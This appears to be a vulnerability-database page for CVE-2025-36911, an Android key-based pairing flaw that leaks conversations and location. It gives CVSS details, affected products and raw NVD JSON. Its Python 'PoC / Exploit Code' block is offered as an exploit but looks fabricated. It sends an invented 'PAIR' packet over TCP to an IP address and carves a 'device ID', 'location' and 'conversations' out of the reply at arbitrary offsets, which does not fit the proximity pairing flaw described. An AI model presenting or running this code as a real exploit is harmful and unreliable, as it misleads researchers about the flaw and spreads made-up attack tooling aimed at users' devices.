Security Vulnerability Report
中文
CVE-2025-36911 CVSS 7.1 HIGH

CVE-2025-36911

Published: 2026-01-15 18:16:37
Last Modified: 2026-01-28 05:16:09

Description

In key-based pairing, there is a possible ID due to a logic error in the code. This could lead to remote (proximal/adjacent) information disclosure of user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android key-based pairing (版本未明确列出,需查看官方安全公告)
参考source.android.com 2026-01-01安全公告获取具体受影响版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36911 PoC - Key-based Pairing ID Leak # This PoC demonstrates the ID leakage in Android key-based pairing import socket import struct import time def create_pairing_request(): """Create a malicious pairing request to trigger ID leakage""" # Pairing request packet structure packet = bytearray() packet.extend(b'PAIR') # Protocol header packet.extend(struct.pack('B', 0x01)) # Pairing request type packet.extend(b'\x00' * 16) # Challenge data return bytes(packet) def exploit_cve_2025_36911(target_ip, port=0x1234): """ Exploit key-based pairing ID leakage vulnerability Args: target_ip: Target Android device IP address port: Pairing service port (default 0x1234) Returns: Leaked ID and sensitive information """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((target_ip, port)) # Send pairing request sock.send(create_pairing_request()) # Receive response containing leaked ID response = sock.recv(1024) # Parse leaked identifier leaked_id = response[4:20].hex() print(f"[+] Leaked Device ID: {leaked_id}") # Extract additional info if present location_data = response[20:28] conversation_ref = response[28:44].hex() print(f"[+] Location Data: {location_data.hex()}") print(f"[+] Conversation Reference: {conversation_ref}") return { 'device_id': leaked_id, 'location': location_data.hex(), 'conversations': conversation_ref } except Exception as e: print(f"[-] Error: {e}") return None finally: sock.close() # Usage example if __name__ == "__main__": target = "192.168.1.100" # Target device IP result = exploit_cve_2025_36911(target) if result: print("\n[!] Vulnerability confirmed - ID leakage successful")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36911", "sourceIdentifier": "[email protected]", "published": "2026-01-15T18:16:37.193", "lastModified": "2026-01-28T05:16:08.870", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In key-based pairing, there is a possible ID due to a logic error in the code. This could lead to remote (proximal/adjacent) information disclosure of user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation."}, {"lang": "es", "value": "En el emparejamiento basado en claves, hay una posible revelación de información debido a un error lógico en el código. Esto podría llevar a la revelación de información remota (próxima/adyacente) de las conversaciones y la ubicación del usuario sin necesidad de privilegios de ejecución adicionales. No se necesita interacción del usuario para la explotación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/docs/security/bulletin/pixel/2026/2026-01-01", "source": "[email protected]"}, {"url": "https://whisperpair.eu/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}